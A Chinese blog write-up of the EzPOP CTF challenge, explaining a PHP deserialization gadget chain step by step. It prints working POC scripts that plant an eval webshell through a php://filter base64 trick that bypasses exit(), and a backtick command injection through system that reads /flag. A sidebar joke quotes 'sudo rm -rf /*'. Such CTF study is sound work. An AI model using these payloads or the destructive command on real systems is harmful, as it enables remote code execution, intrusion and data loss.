本站消息

站长简介/公众号

出租广告位,需要合作请联系站长

我叫你一声你敢答应吗

4145

文章

1895290

访问

+关注

分类

暂无分类

日期归档

2023-05(3)

2023-06(4)

[EIS2019]EzPOP--反序列化题目

发布于2022-08-03 17:35 阅读(1287) 评论(0) 点赞(17) 收藏(3)

上代码，开搞


<?php
error_reporting(0);
 
class A {
 
    protected $store;
 
    protected $key;
 
    protected $expire;
 
    public function __construct($store, $key = 'flysystem', $expire = null) {
        $this->key = $key;
        $this->store = $store;
        $this->expire = $expire;
    }
 
    public function cleanContents(array $contents) {
        $cachedProperties = array_flip([
            'path', 'dirname', 'basename', 'extension', 'filename',
            'size', 'mimetype', 'visibility', 'timestamp', 'type',
        ]);
 
        foreach ($contents as $path => $object) {
            if (is_array($object)) {
                $contents[$path] = array_intersect_key($object, $cachedProperties);
            }
        }
 
        return $contents;
    }
 
    public function getForStorage() {
        $cleaned = $this->cleanContents($this->cache);
 
        return json_encode([$cleaned, $this->complete]);
    }
 
    public function save() {
        $contents = $this->getForStorage();
 
        $this->store->set($this->key, $contents, $this->expire);
    }
 
    public function __destruct() {
        if (!$this->autosave) {
            $this->save();
        }
    }
}
 
class B {
 
    protected function getExpireTime($expire): int {
        return (int) $expire;
    }
 
    public function getCacheKey(string $name): string {
        return $this->options['prefix'] . $name;
    }
 
    protected function serialize($data): string {
        if (is_numeric($data)) {
            return (string) $data;
        }
 
        $serialize = $this->options['serialize'];
 
        return $serialize($data);
    }
 
    public function set($name, $value, $expire = null): bool{
        $this->writeTimes++;
 
        if (is_null($expire)) {
            $expire = $this->options['expire'];
        }
 
        $expire = $this->getExpireTime($expire);
        $filename = $this->getCacheKey($name);
 
        $dir = dirname($filename);
 
        if (!is_dir($dir)) {
            try {
                mkdir($dir, 0755, true);
            } catch (\Exception $e) {
                // 创建失败
            }
        }
 
        $data = $this->serialize($value);
 
        if ($this->options['data_compress'] && function_exists('gzcompress')) {
            //数据压缩
            $data = gzcompress($data, 3);
        }
 
        $data = "<?php\n//" . sprintf('%012d', $expire) . "\n exit();?>\n" . $data;
        $result = file_put_contents($filename, $data);
 
        if ($result) {
            return true;
        }
 
        return false;
    }
 
}
 
if (isset($_GET['src']))
{
    highlight_file(__FILE__);
}
 
$dir = "uploads/";
 
if (!is_dir($dir))
{
    mkdir($dir);
}
unserialize($_GET["data"]);

逆向数据流分析

发现代码中可利用点只有file_put_contents($filename, $data) ，所以我们从它开始倒推

我们需要分别找到$data的链和$filename的链

$data链

使options['data_compress']=false,不让$data压缩

data来自value,$data = $this->serialize($value);，

使options['serialize']=trim，这样serialize就变成trim函数了

serialize($value)为要写入的内容,由set传入

set由A的save调用,$this->store->set($this->key, $contents, $this->expire); 让$this->store = $b;才能调用set方法

value由$contents传入，分析$contents，$contents = $this->getForStorage();

进入getForStorage方法：返回值由$cleaned（$this->cache控制）, $this->complete控制，这里$this->cache有过滤,让$this->cache=array() ,并使$a->complete=payload

使$a->autosave=false,析构方法调用save方法

$filename链

在B的set中$filename = $this->getCacheKey($name);$name为set的参数1

getCacheKey中给name加了前缀,$this->options['prefix'] . $name,让$b->options['prefix']=文件名

save中$this->store->set($this->key, $contents, $this->expire);

总结,$a->key=.php,b->options['prefix']=要访问的文件名

POC1

给出目前的POC（注意：目前还不能得到flag,下文分析）


<?php
class A {
    protected $store;
    protected $key;
    protected $expire;
 
	public function __construct($store, $key = 'flysystem', $expire = null) {
        $this->key = $key;
        $this->store = $store;
        $this->expire = $expire;
    }
}
 
class B {
}
 
$b = new B();
$b->options['data_compress']=false;
$b->options['serialize']='trim';
$b->options['prefix']='shell';
 
 
$a = new A($b,'.php',null);
$a->autosave=false;
$a->cache=array();
$a->complete='<?php phpinfo();?>';
 
echo urlencode(serialize($a));
?>

正向函数调用分析

我们再正向来一遍（加粗的使函数，标红的是数据）

入口函数是__destruct()，$a->autosave为false，进入if分支，调用save方法。

$contents 为getForStorage()的返回值

进入getForStorage()方法，$a->complete为payload，返回{,payload}

此时$contents={,payload}，$a->key=.php，$a->store=$b

调用b的set方法，$b->set('.php',payload,null)

进入b的set方法

调用getExpireTime后$expire=0

调用getCacheKey后$filename=shell.php

后面又调用serialize方法，进入发现返回b->options['serialize'](data),也就是说b->options['serialize']是一个函数名，用来处理data,这里为trim()不影响data

b->options['data_compress']为false，不进入if分支

此时$data=<?php\n//000000000000\n exit();?>\npayload

最后file_put_contents将data写入shell.php

绕过exit()

我们在本地测试，发现payload能写入shell.php，但是前面有exit(),不能执行

利用base64编码,拼接掉前面的exit


$b = new B();
$b->options['data_compress']=false;
$b->options['serialize']='trim';
$b->options['prefix']='php://filter/write=convert.base64-decode/resource=uploads/shell';
 
 
$a = new A($b,'.php',null);
$a->autosave=false;
$a->cache=array();
$a->complete='aaa'.base64_encode('<?php @eval($_POST["shell"]);?>');
 
echo urlencode(serialize($a));

完整POC:


<?php
class A {
    protected $store;
    protected $key;
    protected $expire;
 
	public function __construct($store, $key = 'flysystem', $expire = null) {
        $this->key = $key;
        $this->store = $store;
        $this->expire = $expire;
    }
}
 
class B {
}
 
$b = new B();
$b->options['data_compress']=false;
$b->options['serialize']='trim';
$b->options['prefix']='php://filter/write=convert.base64-decode/resource=uploads/shell';
 
 
$a = new A($b,'.php',null);
$a->autosave=false;
$a->cache=array();
$a->complete='aaa'.base64_encode('<?php @eval($_POST["shell"]);?>');
 
echo urlencode(serialize($a));
?>

使用反引号绕过

参考自https://www.sec-in.com/article/333


$b = new B();
$b-&gt;writeTimes = 0;
$b -&gt; options = array('serialize' =&gt; "system",
    'data_compress' =&gt; false,
    'prefix' =&gt; "b");
 
$a = new A($store = $b, $key = ".php", $expire = 0);
$a-&gt;autosave = false;
$a-&gt;cache = array();
$a-&gt;complete = '`cat /flag &gt; ./flag.php`';
 
echo urlencode(serialize($a));

相当于

system('[[],"`cat /flag &gt; ./flag.php`"]')

在shell里执行的时候反引号的优先级是高于引号的，所以会先执行cat /flag > ./flag.php，flag就被写到flag.php里面去了

来自ctf小菜鸡的日常分享，欢迎各位大佬留言。

2022年最受欢迎的8大编程语言

为什么都说程序员找不到女朋友，但是身边程序猿的却没一个单身的

30岁以上你还死磕技术，别说拿高薪，可能你连饭碗都会保不住

程序员被开除，老板：“有你参与的项目全黄了！”

笑话：一个测试工程师走进一家酒吧

趣图：程序员头疼的4种原因

笑话：面试官：请拿出一段体现你水平的代码。我： sudo rm -rf /*面试官：这体现了你哪方面能力？

php精选：aardio + PHP 可视化快速开发独立 EXE 桌面程序

网友说：做开发，不被领导喜欢怎么办？

网友说：我奉劝各位，一定不能在职场透露自己的家庭条件

所属网站分类: 技术文章 > 博客

作者：我叫你一声你敢答应吗

链接：http://www.phpheidong.com/blog/article/355565/b1aa869bc9806540973f/

来源：php黑洞网

任何形式的转载都请注明出处,如有侵权一经发现必将追究其法律责任

17 0

收藏该文

昵称:

评论内容：(最多支持255个字符)

---无人问津也好，技不如人也罢，你都要试着安静下来，去做自己该做的事，而不是让内心的烦躁、焦虑，坏掉你本来就不多的热情和定力

程序员的那些事(new)

2022年最受欢迎的8大编程语言

为什么都说程序员找不到女朋友，但是身边程序猿的却没一个单身的

30岁以上你还死磕技术，别说拿高薪，可能你连饭碗都会保不住

程序员被开除，老板：“有你参与的项目全黄了！”

笑话：一个测试工程师走进一家酒吧

趣图：程序员头疼的4种原因

笑话：面试官：请拿出一段体现你水平的代码。我： sudo rm -rf /*面试官：这体现了你哪方面能力？

php精选：aardio + PHP 可视化快速开发独立 EXE 桌面程序

网友说：做开发，不被领导喜欢怎么办？

网友说：我奉劝各位，一定不能在职场透露自己的家庭条件

电子书(new)

PHP Cookbook：PHP程序员的解决方案和示例 pdf

PHP核心技术与最佳实践 pdf

PHP高级程序设计：模式，框架与测试 pdf

PHP程序设计 pdf

PHP精粹：编写高效的PHP代码 pdf

深度PHP：面向对象，模式与实践（第2版）pdf

PHP与MySQL 5程序设计（第2版） pdf

搜索引擎优化高级编程：使用PHP进行专业搜索引擎优化 pdf

PHP和MySQL Web开发（原书第4版）pdf下载

现代PHP（中文版）pdf下载

脚本(new)

用PHP创建的在线寻宝游戏

保龄球游戏卡塔使用PHP和PHPUnit

一个用php编写的国际象棋游戏

使用PHP后端的实时多人游戏

基于PHP的在线寻宝游戏

jQuery和PHP扑克游戏

PHP德州扑克游戏

PHP中的保龄球游戏Kata

在线角色扮演游戏

由PHP IRC机器人提供支持的热门狼人游戏（黑手党的变种）

博客(new)

zookeeper实现分布式锁

商品管理系统数据库设计--SQL Server

springboot+mybatis+echarts +mysql制作数据可视化大屏

【MySQL新手入门系列一】：手把手教你入门MySQL

【MySQL】一文带你了解表的增删改查 CRUD

【MySQL 数据查询】:提高查询的效率

Python爬取180天的天气信息及数据分析

MySQL的下载、安装、配置（图文详解）

springboot服务端接口公网远程调试 - 实现HTTP服务监听【端口映射】

MySQL的登录与退出（图文讲解）

视频教程(new)

正则表达式极速入门

php从零开始开发属于自己的php框架

Thinkphp3.2.3个人博客开发

ThinkPHP5快速开发企业站点[全程实录]

ThinkPHP5实战之[教学管理系统]

PHP视频教程

ThinkPHP5视频教程

CI框架30分钟极速入门

PHP实战微信支付视频教程

PHP实战仿爱奇艺电影网站，视频教程

项目实战(new)

PHP发送邮件功能

PHP注册时短信通知功能

smarty模板引擎[函数篇]

PHP制作阴阳历转换的日历插件

PHP项目开发案例全程实录视频及源码

PHP 发表评论功能实战教程

布尔教育Blog项目实战视频教程

Yii2框架搭建完整博客系统

Laravel5.2博客实战视频教程

Thinkphp3.2.3个人博客开发实战

问答(new)

Codeigniter 购物车中的散装物品已空

简单的 PHP 路由，未定义 php7 及更低版本的 url

php删除shell脚本的输出文件（脚本通过php运行）

如果 TD-id == $var-date -> 显示 $var 名称 tp 特定 td -Laravel 5.3

PHP如何解决选择框内的嵌套数组值

Laravel 找不到类？

上下文右键单击时链接损坏 - Backbone.js

从ajax调用单独文件中的php函数不起作用

将 WordPress 帖子标题作为链接引入

如何编写独立于 HTML 表单的动态查询

游戏(new)

Conway的PHP生活游戏

用PHP和JavaScript编写的UNO游戏

国际象棋游戏-php

php贪吃蛇游戏-源码下载

一个基于PHP的在线足球游戏

PHP小游戏-进击吧战士

php小游戏源码下载

php斗地主游戏

php贪吃蛇游戏源码下载

PHP玩微信跳一跳，源码下载

其他资源(new)

PHP函数string字符串函数视频讲解

php开发验证码最新视频教程

PHP函数之array数组函数视频讲解

PHP模糊查询技术视频教程

php新闻发布系统视频教程

PHP留言板制作经典视频教程

PHP学生管理系统视频教程

PHP入门视频教程之一周学会PHP

命名空间30分钟极速入门

PHP字符串操作经典入门

程序员最近都爱上了这个网站程序员们快来瞅瞅吧！ it98k网:it98k.com

分类

标签

日期归档

[EIS2019]EzPOP--反序列化题目

目录

上代码，开搞

逆向数据流分析

$data链

$filename链

POC1

正向函数调用分析

绕过exit()

利用base64编码,拼接掉前面的exit

完整POC:

使用反引号绕过

程序员最近都爱上了这个网站 程序员们快来瞅瞅吧！ it98k网:it98k.com

分类

标签

日期归档

[EIS2019]EzPOP--反序列化题目

目录

上代码，开搞

逆向数据流分析

$data链

$filename链

POC1

正向函数调用分析

绕过exit()

利用base64编码,拼接掉前面的exit

完整POC:

使用反引号绕过

程序员最近都爱上了这个网站程序员们快来瞅瞅吧！ it98k网:it98k.com